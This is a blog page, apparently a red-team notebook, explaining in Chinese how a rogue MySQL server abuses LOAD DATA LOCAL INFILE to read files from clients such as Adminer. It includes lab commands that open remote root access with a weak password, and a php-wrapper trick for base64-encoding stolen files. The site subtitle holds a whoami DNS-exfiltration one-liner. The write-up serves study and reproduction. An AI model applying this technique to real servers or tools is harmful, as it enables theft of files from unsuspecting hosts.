<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="en">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT" />




  


  <link rel="alternate" href="/atom.xml" title="Breezy's Blog" type="application/atom+xml" />






<meta name="description" content="一直都想填的一个坑，之前也想写文章记录一下，由于太忙了水了水就过去了，昨天又遇到了相关的情况，并且很多问题也是之前没有理解清楚的，特此记录一番。 &#x2F;&#x2F; 刚好作为每天水文。 0x00标题为Mysql任意读取客户端文件，拆分一下，关键词为Mysql和客户端以及如何实现任意读取的问题。 Mysql会涉及到一个版本的问题，不同版本特性差异，比如4.x可能就没有记录数据库名、表名和列名的informatio">
<meta property="og:type" content="article">
<meta property="og:title" content="Mysql任意读取客户端文件">
<meta property="og:url" content="http://a1ne.github.io/2020/03/31/Mysql%E4%BB%BB%E6%84%8F%E8%AF%BB%E5%8F%96%E5%AE%A2%E6%88%B7%E7%AB%AF%E6%96%87%E4%BB%B6/index.html">
<meta property="og:site_name" content="Breezy&#39;s Blog">
<meta property="og:description" content="一直都想填的一个坑，之前也想写文章记录一下，由于太忙了水了水就过去了，昨天又遇到了相关的情况，并且很多问题也是之前没有理解清楚的，特此记录一番。 &#x2F;&#x2F; 刚好作为每天水文。 0x00标题为Mysql任意读取客户端文件，拆分一下，关键词为Mysql和客户端以及如何实现任意读取的问题。 Mysql会涉及到一个版本的问题，不同版本特性差异，比如4.x可能就没有记录数据库名、表名和列名的informatio">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://a1ne.github.io/images/mysql_arbitrary_read/adminer.png">
<meta property="og:image" content="http://a1ne.github.io/images/mysql_arbitrary_read/table.png">
<meta property="og:image" content="http://a1ne.github.io/images/mysql_arbitrary_read/read.png">
<meta property="og:image" content="http://a1ne.github.io/images/mysql_arbitrary_read/server.png">
<meta property="og:image" content="http://a1ne.github.io/images/mysql_arbitrary_read/protocol.png">
<meta property="article:published_time" content="2020-04-01T00:04:00.000Z">
<meta property="article:modified_time" content="2020-04-01T16:06:09.135Z">
<meta property="article:author" content="Breezy">
<meta property="article:tag" content="RedTeam">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://a1ne.github.io/images/mysql_arbitrary_read/adminer.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://a1ne.github.io/2020/03/31/Mysql任意读取客户端文件/"/>





  <title>Mysql任意读取客户端文件 | Breezy's Blog</title>
  








<meta name="generator" content="Hexo 4.2.0"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Breezy's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">$> ping -c 1 `whoami`.u.com</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/%20" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/%20" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            Archives
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://a1ne.github.io/2020/03/31/Mysql%E4%BB%BB%E6%84%8F%E8%AF%BB%E5%8F%96%E5%AE%A2%E6%88%B7%E7%AB%AF%E6%96%87%E4%BB%B6/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Breezy">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Breezy's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Mysql任意读取客户端文件</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2020-03-31T17:04:00-07:00">
                2020-03-31
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>一直都想填的一个坑，之前也想写文章记录一下，由于太忙了水了水就过去了，昨天又遇到了相关的情况，并且很多问题也是之前没有理解清楚的，特此记录一番。 // 刚好作为每天水文。</p>
<h2 id="0x00"><a href="#0x00" class="headerlink" title="0x00"></a>0x00</h2><p>标题为Mysql任意读取客户端文件，拆分一下，关键词为Mysql和客户端以及如何实现任意读取的问题。</p>
<p>Mysql会涉及到一个版本的问题，不同版本特性差异，比如<code>4.x</code>可能就没有记录数据库名、表名和列名的information_schema表，而高版本的还可能加入了<code>secure_file_priv</code>这种让你读写两难的设置。针对某些版本可能并没有任意读取的特性，而针对一些版本又可能默认设置为<code>OFF</code></p>
<p>客户端是因为Mysql为C/S模式的程序，直接通过<code>systemctl start mysql</code>启动的是服务端，开启后可以看到指定监听端口是开放状态，通过msyql客户端对其进行连接<code>mysql -u root -p -h 127.0.0.1 -P 3306</code>,从而操作服务端对数据进行<code>CRUD</code>(这里说的有点笼统，其实各种支持Mysql连接的语言，都有各自对应的客户端扩展)。</p>
<p>任意读取涉及到一个特殊的用法<code>load data</code>,从<a href="https://dev.mysql.com/doc/refman/8.0/en/load-data.html" target="_blank" rel="noopener">官方文档</a>可以看出来该用法是为了高速读取文件数据并将其插入到数据表中，与<code>select data into outfile</code>相反。一般而言<code>load data</code>读取的文件是命令执行者本地的文件，比如客户端发起请求需要读取<code>/etc/passwd</code>,这时候读取到的就是服务端的<code>/etc/passwd</code>。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">LOAD DATA</span><br><span class="line">    [LOW_PRIORITY | CONCURRENT] [LOCAL]</span><br><span class="line">    INFILE &#39;file_name&#39;</span><br><span class="line">    [REPLACE | IGNORE]</span><br><span class="line">    INTO TABLE tbl_name</span><br><span class="line">    [PARTITION (partition_name [, partition_name] ...)]</span><br><span class="line">    [CHARACTER SET charset_name]</span><br><span class="line">    [&#123;FIELDS | COLUMNS&#125;</span><br><span class="line">        [TERMINATED BY &#39;string&#39;]</span><br><span class="line">        [[OPTIONALLY] ENCLOSED BY &#39;char&#39;]</span><br><span class="line">        [ESCAPED BY &#39;char&#39;]</span><br><span class="line">    ]</span><br><span class="line">    [LINES</span><br><span class="line">        [STARTING BY &#39;string&#39;]</span><br><span class="line">        [TERMINATED BY &#39;string&#39;]</span><br><span class="line">    ]</span><br><span class="line">    [IGNORE number &#123;LINES | ROWS&#125;]</span><br><span class="line">    [(col_name_or_user_var</span><br><span class="line">        [, col_name_or_user_var] ...)]</span><br><span class="line">    [SET col_name&#x3D;&#123;expr | DEFAULT&#125;,</span><br><span class="line">        [, col_name&#x3D;&#123;expr | DEFAULT&#125;] ...]</span><br></pre></td></tr></table></figure>
<p>在上述完整用法中能够看到<code>infile</code>参数,当参数被指定的时候会从客户端读取文件并发送到服务端</p>
<blockquote>
<p>If LOCAL is specified, the file is read by the client program on the client host and sent to the server. The file can be given as a full path name to specify its exact location. If given as a relative path name, the name is interpreted relative to the directory in which the client program was started.<br>When using LOCAL with LOAD DATA, a copy of the file is created in the directory where the MySQL server stores temporary files. See Section B.4.3.5, “Where MySQL Stores Temporary Files”. Lack of sufficient space for the copy in this directory can cause the LOAD DATA LOCAL statement to fail.</p>
</blockquote>
<p>因为平时都是直接使用客户端授权去连接服务端操作，默认环境是客户端可控，这个用法其实很正常，并且对于一些数据的备份转移很有帮助。</p>
<blockquote>
<p>load data local infile语法需要mysql客户端版本在5.1以上<br>可以通过语句show variables like “%local%”; 查看是否开启</p>
</blockquote>
<h2 id="0x01"><a href="#0x01" class="headerlink" title="0x01"></a>0x01</h2><p>在实际情况中，很多网站为了方便远程管理并防止Mysql端口直接暴露，通常会使用一种类似PhpMyAdmin的管理工具,这种管理工具即使作为客户端去管理服务器。如果支持外联，攻击者可以伪造数据库服务器提供连接，在其中执行上述语句对本地的文件(客户端文件)进行读取并插入到表中。</p>
<p>本地搭建adminer(版本需要在4.3.1到4.6.2间)进行复现<br><img src="/images/mysql_arbitrary_read/adminer.png" alt="adminer"><br>在mysql服务器上需要开启外连</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;etc&#x2F;mysql&#x2F;mariadb.conf.d&#x2F;50-server.cnf   修改bind-address 为0.0.0.0</span><br><span class="line">本地连接数据库</span><br><span class="line">use mysql;</span><br><span class="line">update user set host&#x3D;&quot;%&quot; where user&#x3D;&quot;root&quot;;</span><br><span class="line">service mysql restart </span><br><span class="line"></span><br><span class="line">新版的mysql认证方式默认为unix_socket，只允许默认的root用户从本地进行连接</span><br><span class="line">udpate user set plugin&#x3D;&quot;mysql_native_password&quot; where user&#x3D;&quot;root&quot;</span><br><span class="line">update user set authentication_string&#x3D;password(&#39;123456&#39;) where user&#x3D;&#39;root&#39;;</span><br><span class="line">flush privileges;</span><br></pre></td></tr></table></figure>
<p>由于adminer是使用php的mysql客户端扩展进行连接，需要在<code>php.ini</code>中修改如下设置</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">[MySQLi]</span><br><span class="line">mysqli.allow_local_infile &#x3D; On</span><br></pre></td></tr></table></figure>

<p>在adminer服务器和可控mysql服务器中分别朝<code>/etc/1</code>写入不同的内容</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">create table test(content varchar(256));</span><br></pre></td></tr></table></figure>

<p><img src="/images/mysql_arbitrary_read/table.png" alt="table"><br>执行命令</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">load data local infile &quot;&#x2F;etc&#x2F;1&quot; into table test;</span><br><span class="line">select * form test;</span><br></pre></td></tr></table></figure>

<p><img src="/images/mysql_arbitrary_read/read.png" alt="read"><br>能够看到这里读取出来的内容是<code>web_server</code>也就是adminer web服务器写入的内容。</p>
<p>修改命令</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">load data infile &quot;&#x2F;etc&#x2F;1&quot; into table test;</span><br></pre></td></tr></table></figure>

<p><img src="/images/mysql_arbitrary_read/server.png" alt="server"><br>此时即是正常的读取文件的用法</p>
<h2 id="0x02"><a href="#0x02" class="headerlink" title="0x02"></a>0x02</h2><p>在有的时候文件内容存在特殊字符，在读取的时候就会出现空格截断或者读取不出的情况，一个解决思路是添加多个字段来存放空格分格后的内容，或者通过替换将特殊字符变成能够支持的字符，还有就是对文件内容进行编码。</p>
<p>如果是mysql客户端，最常见的用法就是hex编码，在上述语法中。明显不支持hex函数的加入，看似能够替换的<code>replace</code>关键字实际上是针对读取数据主键重复的处理。一般而言就需要采取多个字段自动分隔的手段。</p>
<p>鉴于上述是通过php的扩展实现，猜测读取文件可能是通过<code>file_get_contents()</code>之类的函数实现，而php是支持很多协议的<code>php,phar,zlib</code>等。可以通过各种协议的加入实现编码效果。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">测试过程第一步可以简单实用file协议读取，优先判断扩展是否支持协议</span><br></pre></td></tr></table></figure>
<p>这里直接使用伪协议进行读取</p>
<p><img src="/images/mysql_arbitrary_read/protocol.png" alt="protocol"><br>读取内容解密</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">d2ViX3NlcnZlcgo&#x3D;</span><br><span class="line">&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&gt;</span><br><span class="line">web_server</span><br></pre></td></tr></table></figure>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/03/30/Hexo-%E5%8D%9A%E5%AE%A2%E6%90%AD%E5%BB%BA/" rel="next" title="Hexo 博客搭建">
                <i class="fa fa-chevron-left"></i> Hexo 博客搭建
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Breezy</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/%20%7C%7C%20archive">
              
                  <span class="site-state-item-count">2</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#0x00"><span class="nav-number">1.</span> <span class="nav-text">0x00</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x01"><span class="nav-number">2.</span> <span class="nav-text">0x01</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x02"><span class="nav-number">3.</span> <span class="nav-text">0x02</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Breezy</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
